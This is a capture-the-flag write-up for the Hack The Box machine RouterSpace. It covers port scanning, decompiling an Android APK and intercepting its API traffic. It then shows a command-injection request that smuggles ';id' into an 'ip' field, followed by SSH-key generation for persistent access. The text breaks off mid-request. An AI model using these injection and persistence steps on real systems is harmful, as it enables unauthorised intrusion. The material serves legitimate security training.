I"KG<style>
.time {
    text-align: center;
    margin-top: 30px;
    font-family: 'Open Sans', sans-serif;
    font-weight: 300;
    font-style: normal;
}
</style>

<p class="time">09 Jul 2022 | Reading time: ~10 min</p>

<h1 align="center">HackTheBox - RouterSpace [Easy] </h1>

<p class="time" style="font-size: 75%;">

#Android,

#Baron

#Samedit,

#CVE-2021-3156,

#Linux,

#RCE,

#command-injection,

#sudo-privesc

</p>

<p><img src="/assets/images/Screenshots/RouterSpace/RouterSpace.png" alt="box-summary.jpg" /></p>

<hr />

<h2 class="no_toc text-delta" id="table-of-contents">Table of contents</h2>

<ol id="markdown-toc">
  <li><a href="#resolution-summary" id="markdown-toc-resolution-summary">Resolution summary</a>    <ol>
      <li><a href="#improved-skills" id="markdown-toc-improved-skills">Improved skills</a></li>
      <li><a href="#used-tools" id="markdown-toc-used-tools">Used tools</a></li>
    </ol>
  </li>
  <li><a href="#information-gathering" id="markdown-toc-information-gathering">Information Gathering</a></li>
  <li><a href="#enumeration" id="markdown-toc-enumeration">Enumeration</a>    <ol>
      <li><a href="#port-80---http-routerspace" id="markdown-toc-port-80---http-routerspace">Port 80 - HTTP (RouterSpace)</a></li>
      <li><a href="#routerspaceapk" id="markdown-toc-routerspaceapk">RouterSpace.apk</a></li>
    </ol>
  </li>
  <li><a href="#exploitation" id="markdown-toc-exploitation">Exploitation</a>    <ol>
      <li><a href="#command-injection-in-deviceaccess-api" id="markdown-toc-command-injection-in-deviceaccess-api">Command Injection in deviceAccess API</a>        <ol>
          <li><a href="#vulnerable-code" id="markdown-toc-vulnerable-code">Vulnerable Code</a></li>
        </ol>
      </li>
    </ol>
  </li>
  <li><a href="#privilege-escalation" id="markdown-toc-privilege-escalation">Privilege Escalation</a>    <ol>
      <li><a href="#local-enumeration" id="markdown-toc-local-enumeration">Local enumeration</a></li>
      <li><a href="#cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit" id="markdown-toc-cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit">CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)</a></li>
    </ol>
  </li>
  <li><a href="#trophy" id="markdown-toc-trophy">Trophy</a></li>
</ol>
<hr />

<h1 id="resolution-summary">Resolution summary</h1>

<ul>
  <li>Web server allows to download an <strong>APK</strong></li>
  <li>Intercepting the APK’s HTTP traffic it was possible to find an <strong>API</strong> vulnerable to <strong>code injection</strong></li>
  <li>Local enumeration allowed to discover that the machine’s sudo binary was vulnerable to <strong>CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)</strong></li>
</ul>

<h2 id="improved-skills">Improved skills</h2>

<ul>
  <li>Intercepting APK’s HTTP request and testing API</li>
  <li>Finding and exploiting command injection vulnerabilities</li>
  <li>Exploiting known vulnerabilities</li>
</ul>

<h2 id="used-tools">Used tools</h2>

<ul>
  <li>nmap</li>
  <li>apktool &amp; bytecode-viewer</li>
  <li>genymotion</li>
  <li>burpsuite</li>
  <li>scp</li>
</ul>

<hr />

<h1 id="information-gathering">Information Gathering</h1>

<p>Scanned all TCP ports:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/CTFs/HTB/B2R/RouterSpace]
└─<span class="nv">$ </span><span class="nb">sudo </span>nmap <span class="nt">-p-</span> <span class="nt">-v</span> 10.10.11.148 <span class="nt">-sT</span> <span class="nt">-T4</span>
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2022-05-07 14:34 EDT
Initiating Ping Scan at 14:34
Scanning 10.10.11.148 <span class="o">[</span>4 ports]
...
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>112.47 seconds
           Raw packets sent: 4 <span class="o">(</span>152B<span class="o">)</span> | Rcvd: 1 <span class="o">(</span>28B<span class="o">)</span>
</code></pre></div></div>

<p>Enumerated open TCP ports:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/CTFs/HTB/B2R/RouterSpace]
└─<span class="nv">$ </span><span class="nb">sudo </span>nmap <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-p</span> 22,80 <span class="nt">-oN</span> scan/open-tcp-ports.txt 10.10.11.148
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2022-05-07 14:36 EDT
Nmap scan report <span class="k">for </span>10.10.11.148
Host is up <span class="o">(</span>0.038s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     <span class="o">(</span>protocol 2.0<span class="o">)</span>
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c <span class="o">(</span>RSA<span class="o">)</span>
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-93835
|     Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
|     Content-Length: 76
|     ETag: W/<span class="s2">"4c-mbkOKply3sgRHIKxe7Ti+nqgSz8"</span>
|     Date: Sat, 07 May 2022 18:37:03 GMT
|     Connection: close
|     Suspicious activity detected <span class="o">!!!</span> <span class="o">{</span>RequestID: h5mK W v o EI 3 6F <span class="o">}</span>
|   GetRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-34170
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age<span class="o">=</span>0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/<span class="s2">"652c-17d476c9285"</span>
|     Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8
|     Content-Length: 25900
|     Date: Sat, 07 May 2022 18:37:03 GMT
|     Connection: close
|     &lt;<span class="o">!</span>doctype html&gt;
|     &lt;html <span class="nv">class</span><span class="o">=</span><span class="s2">"no-js"</span> <span class="nv">lang</span><span class="o">=</span><span class="s2">"zxx"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">head</span><span class="o">&gt;</span>
|     &lt;meta <span class="nv">charset</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="o">&gt;</span>
|     &lt;meta http-equiv<span class="o">=</span><span class="s2">"x-ua-compatible"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"ie=edge"</span><span class="o">&gt;</span>
|     &lt;title&gt;RouterSpace&lt;/title&gt;
|     &lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">"description"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">""</span><span class="o">&gt;</span>
|     &lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">"viewport"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"width=device-width, initial-scale=1"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/bootstrap.min.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/owl.carousel.min.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/magnific-popup.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/font-awesome.min.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/themify-icons.css"</span><span class="o">&gt;</span>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-1296
|     Allow: GET,HEAD,POST
|     Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
|     Content-Length: 13
|     ETag: W/<span class="s2">"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"</span>
|     Date: Sat, 07 May 2022 18:37:03 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe:
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
<span class="o">==============</span>NEXT SERVICE FINGERPRINT <span class="o">(</span>SUBMIT INDIVIDUALLY<span class="o">)==============</span>
SF-Port22-TCP:V<span class="o">=</span>7.92%I<span class="o">=</span>7%D<span class="o">=</span>5/7%Time<span class="o">=</span>6276BC4F%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>NULL,
SF:29,<span class="s2">"SSH-2</span><span class="se">\.</span><span class="s2">0-RouterSpace</span><span class="se">\x</span><span class="s2">20Packet</span><span class="se">\x</span><span class="s2">20Filtering</span><span class="se">\x</span><span class="s2">20V1</span><span class="se">\r\n</span><span class="s2">"</span><span class="o">)</span><span class="p">;</span>
<span class="o">==============</span>NEXT SERVICE FINGERPRINT <span class="o">(</span>SUBMIT INDIVIDUALLY<span class="o">)==============</span>
SF-Port80-TCP:V<span class="o">=</span>7.92%I<span class="o">=</span>7%D<span class="o">=</span>5/7%Time<span class="o">=</span>6276BC50%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>GetRe
SF:quest,312C,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X-Powered-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">X
SF:-Cdn:</span><span class="se">\x</span><span class="s2">20RouterSpace-34170</span><span class="se">\r\n</span><span class="s2">Accept-Ranges:</span><span class="se">\x</span><span class="s2">20bytes</span><span class="se">\r\n</span><span class="s2">Cache-Control:
SF:</span><span class="se">\x</span><span class="s2">20public,</span><span class="se">\x</span><span class="s2">20max-age=0</span><span class="se">\r\n</span><span class="s2">Last-Modified:</span><span class="se">\x</span><span class="s2">20Mon,</span><span class="se">\x</span><span class="s2">2022</span><span class="se">\x</span><span class="s2">20Nov</span><span class="se">\x</span><span class="s2">202021
SF:</span><span class="se">\x</span><span class="s2">2011:33:57</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">20W/</span><span class="se">\"</span><span class="s2">652c-17d476c9285</span><span class="se">\"\r\n</span><span class="s2">Content-Type:
SF:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">20charset=UTF-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2025900</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">2
SF:0Sat,</span><span class="se">\x</span><span class="s2">2007</span><span class="se">\x</span><span class="s2">20May</span><span class="se">\x</span><span class="s2">202022</span><span class="se">\x</span><span class="s2">2018:37:03</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r</span><span class="s2">
SF:</span><span class="se">\n\r\n</span><span class="s2">&lt;!doctype</span><span class="se">\x</span><span class="s2">20html&gt;</span><span class="se">\n</span><span class="s2">&lt;html</span><span class="se">\x</span><span class="s2">20class=</span><span class="se">\"</span><span class="s2">no-js</span><span class="se">\"\x</span><span class="s2">20lang=</span><span class="se">\"</span><span class="s2">zxx</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n</span><span class="s2">&lt;h
SF:ead&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;meta</span><span class="se">\x</span><span class="s2">20charset=</span><span class="se">\"</span><span class="s2">utf-8</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;met
SF:a</span><span class="se">\x</span><span class="s2">20http-equiv=</span><span class="se">\"</span><span class="s2">x-ua-compatible</span><span class="se">\"\x</span><span class="s2">20content=</span><span class="se">\"</span><span class="s2">ie=edge</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">
SF:20</span><span class="se">\x</span><span class="s2">20&lt;title&gt;RouterSpace&lt;/title&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;meta</span><span class="se">\x</span><span class="s2">20name=</span><span class="se">\"</span><span class="s2">descr
SF:iption</span><span class="se">\"\x</span><span class="s2">20content=</span><span class="se">\"\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;meta</span><span class="se">\x</span><span class="s2">20name=</span><span class="se">\"</span><span class="s2">viewport</span><span class="se">\"\x</span><span class="s2">
SF:20content=</span><span class="se">\"</span><span class="s2">width=device-width,</span><span class="se">\x</span><span class="s2">20initial-scale=1</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">
SF:20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/bootstrap</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">2
SF:0</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/owl</span><span class="se">\.</span><span class="s2">carousel</span><span class="se">\.</span><span class="s2">m
SF:in</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/m
SF:agnific-popup</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20h
SF:ref=</span><span class="se">\"</span><span class="s2">css/font-awesome</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">sty
SF:lesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/themify-icons</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20"</span><span class="o">)</span>%r<span class="o">(</span>HTTPOptions,107
SF:,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X-Powered-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">X-Cdn:</span><span class="se">\x</span><span class="s2">20R
SF:outerSpace-1296</span><span class="se">\r\n</span><span class="s2">Allow:</span><span class="se">\x</span><span class="s2">20GET,HEAD,POST</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/htm
SF:l;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2013</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">20W/</span><span class="se">\"</span><span class="s2">d-bMedpZYG
SF:rVt1nR4x</span><span class="se">\+</span><span class="s2">qdNZ2GqyRo</span><span class="se">\"\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Sat,</span><span class="se">\x</span><span class="s2">2007</span><span class="se">\x</span><span class="s2">20May</span><span class="se">\x</span><span class="s2">202022</span><span class="se">\x</span><span class="s2">2018:37:0
SF:3</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">GET,HEAD,POST"</span><span class="o">)</span>%r<span class="o">(</span>RTSPRequest,2
SF:F,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">"</span><span class="o">)</span>
SF:%r<span class="o">(</span>X11Probe,2F,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20cl
SF:ose</span><span class="se">\r\n\r\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>FourOhFourRequest,132,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X-Powe
SF:red-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">X-Cdn:</span><span class="se">\x</span><span class="s2">20RouterSpace-93835</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\</span><span class="s2">
SF:x20text/html;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2076</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">20W/</span><span class="se">\</span><span class="s2">
SF:"</span>4c-mbkOKply3sgRHIKxe7Ti<span class="se">\+</span>nqgSz8<span class="se">\"\r\n</span>Date:<span class="se">\x</span>20Sat,<span class="se">\x</span>2007<span class="se">\x</span>20May<span class="se">\x</span>20202
SF:2<span class="se">\x</span>2018:37:03<span class="se">\x</span>20GMT<span class="se">\r\n</span>Connection:<span class="se">\x</span>20close<span class="se">\r\n\r\n</span>Suspicious<span class="se">\x</span>20activ
SF:ity<span class="se">\x</span>20detected<span class="se">\x</span>20!!!<span class="se">\x</span>20<span class="o">{</span>RequestID:<span class="se">\x</span>20h5mK<span class="se">\x</span>20<span class="se">\x</span>20<span class="se">\x</span>20<span class="se">\x</span>20<span class="se">\x</span>20W<span class="se">\x</span>20v
SF:<span class="se">\x</span>20o<span class="se">\x</span>20EI<span class="se">\x</span>203<span class="se">\x</span>20<span class="se">\x</span>206F<span class="se">\x</span>20<span class="o">}</span><span class="se">\n\n\n\n\n\n</span><span class="s2">");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.16 seconds
</span></code></pre></div></div>

<h1 id="enumeration">Enumeration</h1>

<h2 id="port-80---http-routerspace">Port 80 - HTTP (RouterSpace)</h2>

<p>Enumerated home page:</p>

<p><img src="/assets/images/Screenshots/RouterSpace/Untitled.png" alt="Untitled" /></p>

<p>Downloaded the APK from the site:</p>

<p><a href="http://10.10.11.148/RouterSpace.apk">http://10.10.11.148/RouterSpace.apk</a></p>

<h2 id="routerspaceapk">RouterSpace.apk</h2>

<p>Decompiled the APK:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/…/HTB/B2R/RouterSpace/loot]
└─<span class="nv">$ </span>apktool d RouterSpace.apk
Picked up _JAVA_OPTIONS: <span class="nt">-Dawt</span>.useSystemAAFontSettings<span class="o">=</span>on <span class="nt">-Dswing</span>.aatext<span class="o">=</span><span class="nb">true
</span>I: Using Apktool 2.5.0-dirty on RouterSpace.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/kali/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values <span class="k">*</span>/<span class="k">*</span> XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
</code></pre></div></div>

<p>Analyzed the AndroidManifest.xml searching for android:minSdkVersion:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/…/HTB/B2R/RouterSpace/loot]
└─<span class="nv">$ </span>bat AndroidManifest.xml
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: AndroidManifest.xml
       │ Size: 1.1 KB
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ &lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">"1.0"</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">"utf-8"</span> <span class="nv">standalone</span><span class="o">=</span><span class="s2">"no"</span>?&gt;&lt;manifest xmlns:android<span class="o">=</span><span class="s2">"http://schemas.android.com/apk/res/android"</span> android:compileSdkVersion<span class="o">=</span><span class="s2">"30"</span> android:compileSdkVersionCodename<span class="o">=</span><span class="s2">"11"</span> <span class="nv">package</span><span class="o">=</span><span class="s2">"com.routerspace"</span> platform
       │ <span class="nv">BuildVersionCode</span><span class="o">=</span><span class="s2">"30"</span> <span class="nv">platformBuildVersionName</span><span class="o">=</span><span class="s2">"11"</span><span class="o">&gt;</span>
   2   │     &lt;uses-permission android:name<span class="o">=</span><span class="s2">"android.permission.INTERNET"</span>/&gt;
   3   │     &lt;application android:allowBackup<span class="o">=</span><span class="s2">"false"</span> android:appComponentFactory<span class="o">=</span><span class="s2">"androidx.core.app.CoreComponentFactory"</span> android:icon<span class="o">=</span><span class="s2">"@mipmap/ic_launcher"</span> android:label<span class="o">=</span><span class="s2">"@string/app_name"</span> android:name<span class="o">=</span><span class="s2">"com.routerspace.MainApplication
       │ "</span> android:roundIcon<span class="o">=</span><span class="s2">"@mipmap/ic_launcher"</span> android:theme<span class="o">=</span><span class="s2">"@style/AppTheme"</span><span class="o">&gt;</span>
   4   │         &lt;activity android:configChanges<span class="o">=</span><span class="s2">"keyboard|keyboardHidden|orientation|screenSize|uiMode"</span> android:label<span class="o">=</span><span class="s2">"@string/app_name"</span> android:launchMode<span class="o">=</span><span class="s2">"singleTask"</span> android:name<span class="o">=</span><span class="s2">"com.routerspace.MainActivity"</span> android:windowSoftInpu
       │ <span class="nv">tMode</span><span class="o">=</span><span class="s2">"adjustResize"</span><span class="o">&gt;</span>
   5   │             &lt;intent-filter&gt;
   6   │                 &lt;action android:name<span class="o">=</span><span class="s2">"android.intent.action.MAIN"</span>/&gt;
   7   │                 &lt;category android:name<span class="o">=</span><span class="s2">"android.intent.category.LAUNCHER"</span>/&gt;
   8   │             &lt;/intent-filter&gt;
   9   │         &lt;/activity&gt;
  10   │     &lt;/application&gt;
  11   │ &lt;/manifest&gt;
</code></pre></div></div>

<p>Ran the APK on Genymotion (used Android 6.0 because no android:minSdkVersion have been found, so older Android device can be used and certificates can be imported easily):</p>

<p><img src="/assets/images/Screenshots/RouterSpace/Untitled%201.png" alt="Untitled" /></p>

<p>Set up the environment:</p>
<iframe width="560" height="315" src="https://www.youtube.com/embed/CJR_BSIStmE?start=372" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>

<p>Intercepted APK traffic:</p>

<p><img src="/assets/images/Screenshots/RouterSpace/Untitled%202.png" alt="Untitled" /></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, <span class="k">*</span>/<span class="k">*</span>
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 16
Host: routerspace.htb
Connection: close
Accept-Encoding: <span class="nb">gzip</span>, deflate

<span class="o">{</span><span class="s2">"ip"</span>:<span class="s2">"0.0.0.0"</span><span class="o">}</span>
</code></pre></div></div>

<h1 id="exploitation">Exploitation</h1>

<h2 id="command-injection-in-deviceaccess-api">Command Injection in deviceAccess API</h2>

<p>Request:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, <span class="k">*</span>/<span class="k">*</span>
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 19
Host: routerspace.htb
Connection: close
Accept-Encoding: <span class="nb">gzip</span>, deflate

<span class="o">{</span><span class="s2">"ip"</span>:<span class="s2">"0.0.0.0;id"</span><span class="o">}</span>
</code></pre></div></div>

<p>Responde:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 200 OK
X-Powered-By: RouterSpace
X-Cdn: RouterSpace-19542
Content-Type: application/json<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
Content-Length: 60
ETag: W/<span class="s2">"3c-sZwJm+90xtMPuuO1H89HShTmFxY"</span>
Date: Sat, 07 May 2022 19:25:32 GMT
Connection: close

<span class="s2">"0.0.0.0</span><span class="se">\n</span><span class="s2">uid=1001(paul) gid=1001(paul) groups=1001(paul)</span><span class="se">\n</span><span class="s2">"</span>
</code></pre></div></div>

<p>Added a custom SSH key to paul because target machine wasn’t able to connect back to attacker machine:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/…/HTB/B2R/RouterSpace/exploit]
└─<span class="nv">$ </span>ssh-keygen <span class="nt">-b</span> 2048 <span class="nt">-t</span> rsa <span class="nt">-f</span> paul <span class="nt">-q</span> <span class="nt">-N</span> <span class="s2">""</span>

┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/…/HTB/B2R/RouterSpace/exploit]
└─<span class="nv">$ </span><span class="nb">cat </span>paul.pub | xclip <span class="nt">-sel</span> c

┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/…/HTB/B2R/RouterSpace/exploit]
└─<span class="nv">$ </span><span class="nb">chmod </span>500 paul
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 440
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

